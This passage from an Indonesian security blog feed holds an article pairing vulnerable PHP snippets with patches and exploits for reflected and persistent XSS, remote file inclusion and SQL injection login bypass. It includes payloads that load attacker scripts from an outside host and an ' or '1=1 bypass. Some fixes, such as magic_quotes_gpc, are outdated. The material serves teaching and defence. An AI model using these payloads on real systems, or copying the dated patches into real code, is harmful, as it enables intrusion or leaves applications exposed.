			<a href="mailto:?subject=%22SQL%20Injection%20Flaw%20Patching%22&amp;body=Link: http://www.james0baster.web.id/v2/sql-injection-flaw-patching/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;bm_description=SQL+Injection+Flaw+Patching&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;t=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=SQL+Injection+Flaw+Patching+-+http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=SQL+Injection+Flaw+Patching+-+http://bit.ly/g8FLi4&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;submitHeadline=SQL+Injection+Flaw+Patching&amp;submitSummary=dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=SQL+Injection+Flaw+Patching&amp;body=Link: http://www.james0baster.web.id/v2/sql-injection-flaw-patching/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/sql-injection-flaw-patching/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/sql-injection-flaw-patching/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Web Security Yin-Yang (Attacking &amp; Defending)</title>
		<link>http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/</link>
		<comments>http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/#comments</comments>
		<pubDate>Tue, 23 Feb 2010 04:14:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=98</guid>
		<description><![CDATA[<div id="_mcePaste"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg"></a></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg"><img class="alignleft size-full wp-image-99" title="changes400x300" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg" alt="" width="240" height="180" /></a>WEB SECURITY YIN-YANG</p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Ditulis oleh: gentoo,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="mailto:foobar4joo@gmail.com">foobar4joo@gmail.com</a></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="mailto:foobar4joo@gmail.com"></a><span style="color: #000000;">&#8220;If you know both yourself and your enemy, you can win a hundred battles without a single loss.&#8221;</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali kelemahan diri sendiri,<span id="more-98"></span> karena dengan begitu kita dapat seimbang dala, bertahan dan menyerang.  Saya harap artikel ini nantinya akan dapat menjadi referensi singkat yang membahas tentang menyerang dan bertahan dalam dunia keamanan web (web security), dan artikel ini diharapkan juga bisa menjadi titik mula bagi yang tertarik dengan keamanan web, sekaligus pembuka mata bagi para programmer web agar sedikit banyak mulai menaruh perhatian pada keamanan aplikasi yang meraka buat.  Artikel ini akan membahas beberapa jenis celah keamanan web yang umumnya selalu menjadi primadon dikalangan para pemerhati keamanan web, tetapi bahasan disini bukan mencakup detil tiap celah, tetapi lebih ke arah Proof-of-concept dari cara bertahan dan menyerang. Disajikan dengan menggunakan PHP sebagai bahasa pemrograman &#8220;dynamic&#8221;, HTML, serta mysql sebagai &#8220;database engine&#8221;.  Formatnya pun akan selalu sama, penyajian kode yang memiliki celah, cara memperkuatnya (bertahan) kemudian diikuti dengan bagaimana metode untuk mengexploitasinya. Jangan berharap artikel ini akan mengajarkan anda dari Nol, bagaimana membuat web, mengkode dengan PHP dan mysql, atau penjelasan detil (pengertian-panjang-lebar) tentang setiap celah.  Partisipasi aktif andalah yang akan menentukan apakah artikel ini akan bermanfaat buat anda nantinya</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">===// Yin-Yang \\===</span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">====// XSS Reflected \\====<br />
kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . $_GET['sweet'];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun kode untuk melindungi adalah dengan menambahkan fungsi &#8220;strip_tags&#8221; atau &#8220;htmlspecialchars&#8221; untuk memeriksa variabel tersebut terlebih dahulu.<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . strip_tags($_GET['sweet']); </span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">atau PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . htmlspecialchars($_GET['sweet']);</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:sweet.php?sweet=&lt;script&gt;alert(&#8220;XSS&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />&lt;/script&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;">
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">====// XSS Persistent \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$sweet  = trim($_POST['txtSweet']);$sweet  = mysql_real_escape_string($sweet);$query  = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />;&#8221;;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun fungsi yang digunakan untuk mengamankannya adalah &#8220;stripslashes&#8221;, &#8220;addslashes&#8221;, &#8220;htmlspecialchars&#8221;<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$sweet = stripslashes($sweet);$sweet = mysql_real_escape_string($sweet);$sweet = htmlspecialchars($sweet);$query = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />;&#8221;;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;">&#8212;&#8212;&#8211;//</p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">sweet.php?sweet=&lt;SCRIPT SRC=http://dare.dev.il/evil.js?&lt;B&gt;Bedanya, xss exploit ini akan tersimpan ke database dan akan selalu di eksekusi setiap halaman sweet.php di load, selanjutnya tinggal keahlian anda berkreasi pada script evil.js</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
====// File Inclusion \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> Kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\berkas.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$file = $_GET['halaman'];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Adapun Untuk mengamankan berkas.php, cukup dengan mendefinisikan file yangingin kita include secara pasti.<br />
&#8212;&#8212;&#8211;\\berkas-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$file = $_GET['halaman'];</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">// hanya mengijinkan sweet.phpif ( $file != &#8220;sweet.php&#8221; ) {echo &#8220;ERROR: File not found!&#8221;;exit;}</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">|&#8212;&#8212;| Atau untuk melengkapinya, silahkan melakukan serring &#8220;Off&#8221; pada Directive| allow_url_fopen| allow_url_include| pada php.ini|&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Code:berkas.php?halaman=http://dare.dev.il/evil.phpSelanjutnya tergantung keahlian anda berkreasi pada script evil.php, agar berbagai perintah dalam evil.php dapat tereksekusi, ada beberapa syarat lain yang harus dipenuhi, dan ini menjadi PR anda untuk mencari tahu.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
====// SQL Injection \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">SQL injection adalah salah satu teknik yang cukup tua untuk dibahas, celah ini pada web aplikasilah yang paling banyak memberikan andil kepada terkuasainya banyak webserver. Celah ini bisa saya bilang multiplatform karena bisa Database dapat berpasangan dengan bahasa permrograman apapun dan berjalan di sistem-operasi apapun.<br />
Untuk teknik ini saya tidak ingin panjang lebar, tetapi khusus untuk celah lawas ini, kode yang akan saya berikan lengkap, dan bagi para pencinta &#8220;salin &amp; tempel&#8221; akan dengan mudah dapat mengapliaksikannya, hmm sepertinya tidak juga, karena setidaknya kamu harus paham database, membuat tabel dan mengkoneksikannyadengan php<br />
Ok, berikut adalah kode yang telah memiliki tempat sendiri dalam sejarah keamanan aplikasi web <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_lol.gif' alt=':lol:' class='wp-smiley' /> </span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//vulnlogin.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;table&gt;&lt;form name=&#8221;member&#8221; method=&#8221;post&#8221; action=&#8221;#&#8221;&gt;&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;b&gt;Member Login&lt;/b&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Username&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;text&#8221; name=&#8221;username&#8221; value=&#8221;" size=&#8221;40&#8243;&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;password&#8221; name=&#8221;password&#8221; value=&#8221;" size=&#8221;40&#8243;&gt;&lt;/tr&gt;<br />
&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;input type=&#8221;submit&#8221; name=&#8221;submit&#8221; value=&#8221;Submit&#8221;&gt;&lt;input type=&#8221;reset&#8221; name=&#8221;reset&#8221; value=&#8221;Reset&#8221;&gt;&lt;/td&gt;&lt;/form&gt;&lt;/table&gt;<br />
&lt;?phpinclude &#8216;config.php&#8217;; // ini adalah konfigurasi koneksi aplikasi ke database,ga bisa buat? <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_lol.gif' alt=':lol:' class='wp-smiley' /><br />
$username = $_POST['username'];$password = $_POST['password'];<br />
$q = &#8220;SELECT username, password FROM member WHERE username = &#8216;$username&#8217; AND \password = &#8216;$password&#8217; &#8220;;<br />
$r = mysql_query($q);if (!$r) {print mysql_error();} else {$row = mysql_fetch_row($r);if (($row[0] != &#8220;&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" /> &amp;&amp; ($row[1] != &#8220;&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />) {echo &#8220;&amp;nbsp;&amp;nbsp;&lt;a href=somerandompagesnameforyou.php&gt;Yeah, you are in!&lt;/a&gt;&#8221;;} else {echo&#8221;&lt;pre&gt; &amp;nbsp;&amp;nbsp;You need to register as a member to login! &lt;/pre&gt;&#8221;;}}<br />
?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">dan untuk mengamankannya adalah dengan melakukan filtering pada keduavariabel &#8220;username&#8221; dan &#8220;password&#8221;<br />
PHP Code:$username = stripslashes($username);$username = mysql_escape_string($username);$password = stripslashes($password);$password = mysql_real_escape_string($password);|&#8212;-| Untuk memperkuatnya, seandainya ada yang terlewat, melakukan setting| &#8220;On&#8221; untuk| magic_quotes_gpc| pada setting PHP.ini|&#8212;-</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Masukkan &#8216;or &#8216;1=1&#8221; (l33t) pada input box username/password untuk membypasslogin, sehingga rikues akan jadi seperti ini<br />
|&#8212;-|<br />
PHP Code:SELECT username, password FROM member WHERE username = &#8221;or&#8217;1=1&#8221;&#8217; AND password = &#8221;or&#8217;1=1&#8221;&#8217;|&#8212;<br />
Selanjutnya, anda simpulkan sendiri</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
===// Cross Site Requesr Forgery \\===</span></p>
